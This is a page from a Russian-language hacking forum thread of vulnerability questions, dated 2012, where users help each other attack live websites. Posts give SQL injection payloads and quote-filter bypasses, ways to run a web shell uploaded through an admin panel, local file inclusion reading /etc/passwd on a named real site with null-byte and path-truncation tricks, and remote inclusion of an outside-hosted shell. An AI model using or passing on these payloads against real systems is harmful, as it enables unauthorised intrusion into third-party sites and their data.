HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2005 из 2438 « Первая < 10051505190519551995 2001 2002 2003 2004 2005 2006 2007 2008 2009 201520552105 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #20041  
Старый 14.03.2012, 22:28
Fooog
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами: 9285182

Репутация: 340


По умолчанию
Цитата:
Сообщение от OxoTnik  
Цитата:
Сообщение от Fooog  
Где можно почитать о баге типа: news/1'
?
Выдает по типу:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' and pd.news_id ='4'' at line 1
Это обычная sql уязвимость читай /thread43966.html
" if author else f"
Цитата:
OxoTnik said:
Цитата:
Сообщение от Fooog  
Где можно почитать о баге типа: news/1'
?
Выдает по типу:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' and pd.news_id ='4'' at line 1
Это обычная sql уязвимость читай /thread43966.html
Так точно. Но при:

1'+order+by+1+--

Выдает:

- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--' and pd.news_id = '1'+order+by+1+--' and pd.language_id ='1'' at line 1

А при:

1'/**/order/**/by/**/1/**/--

- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '79'' and pd.news_id ='1'' at line 1

+GROUP+BY+1+--

Также не помогает.
 
Ответить с цитированием

  #20042  
Старый 14.03.2012, 22:33
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами: 8960082

Репутация: -14
По умолчанию
Цитата:
Сообщение от Fooog  
Так точно. Но при:
1'+order+by+1+--
Выдает:
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--' and pd.news_id = '1'+order+by+1+--' and pd.language_id ='1'' at line 1
А при:
1'/**/order/**/by/**/1/**/--
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '79'' and pd.news_id ='1'' at line 1
+GROUP+BY+1+--
Также не помогает.
Фильтруется кавычка. Попробуй ?id=9999999999+order+by+1+--
 
Ответить с цитированием

  #20043  
Старый 14.03.2012, 22:41
Га-Ноцри
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами: 7670486

Репутация: 76
По умолчанию
Всем добрый вечер. Суть такова - через админку заливаю шелл. Расширение .php без проблем пропускается, но при обращению к этому скрипту вылетает 500 ошибка. Далее пытался залить в эту же директорию .htaccess, чтобы попробовать порулить Апачем в пределах этой директории, но беда в том, что скрипт дописывает к началу любого загружаемого файла определенные символы, и получается что-то типа x_1.htaccess.

Что можно придумать?
 
Ответить с цитированием

  #20044  
Старый 14.03.2012, 22:48
Fooog
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами: 9285182

Репутация: 340


По умолчанию
Цитата:
Сообщение от aydin-ka  
Фильтруется кавычка. Попробуй ?id=9999999999+order+by+1+--
тоже нет.

not found!

Так же указано. Бага формата не ?id=1, a id/1'

При запросе ?id=1 страница та, но ошибка отсутствует.
 
Ответить с цитированием

  #20045  
Старый 14.03.2012, 22:53
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами: 8960082

Репутация: -14
По умолчанию
Цитата:
Сообщение от Fooog  
тоже нет.
not found!
Так же указано. Бага формата не ?id=1, a id/1'
При запросе ?id=1 страница та, но ошибка отсутствует.
Попробуй так id/1?id=1'

P.S: лучшее ссылку в ПМ...
 
Ответить с цитированием

  #20046  
Старый 14.03.2012, 22:57
Fooog
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
С нами: 9285182

Репутация: 340


По умолчанию
Цитата:
Сообщение от aydin-ka  
Попробуй так id/1?id=1'
P.S: лучшее ссылку в ПМ...
Ошибку не выводит. Отправил в ПМ...
 
Ответить с цитированием

  #20047  
Старый 14.03.2012, 23:26
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию
народ а тут, нужно отсеять окончание, нул байт не помогает

http://proeveryday.ru/index.php?id=../etc/passwd%00

тут читал /thread98525.html но нифига неполучилось, мб недопонял

подскажите как правильно
 
Ответить с цитированием

  #20048  
Старый 15.03.2012, 01:39
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию
попробуй слешей ставить 4064 или также но такихже слешей с точкой примерно так меня выручало /./.[4064]./
 
Ответить с цитированием

  #20049  
Старый 15.03.2012, 02:38
Spunoff
Познающий
Регистрация: 16.01.2012
Сообщений: 40
С нами: 7538006

Репутация: 0
По умолчанию
site.com/page.php=about.php выдаёт about.php на сервере

site.com/page.php=http://shell.com/shell.php показывает шелл но на моём же хосте

Можно как-то залить шелл на site.com?
 
Ответить с цитированием

  #20050  
Старый 15.03.2012, 02:40
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию
скинь ссылку в ЛС,тут же нет экстрасенсов
 
Ответить с цитированием
Ответ
Страница 2005 из 2438 « Первая < 10051505190519551995 2001 2002 2003 2004 2005 2006 2007 2008 2009 201520552105 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.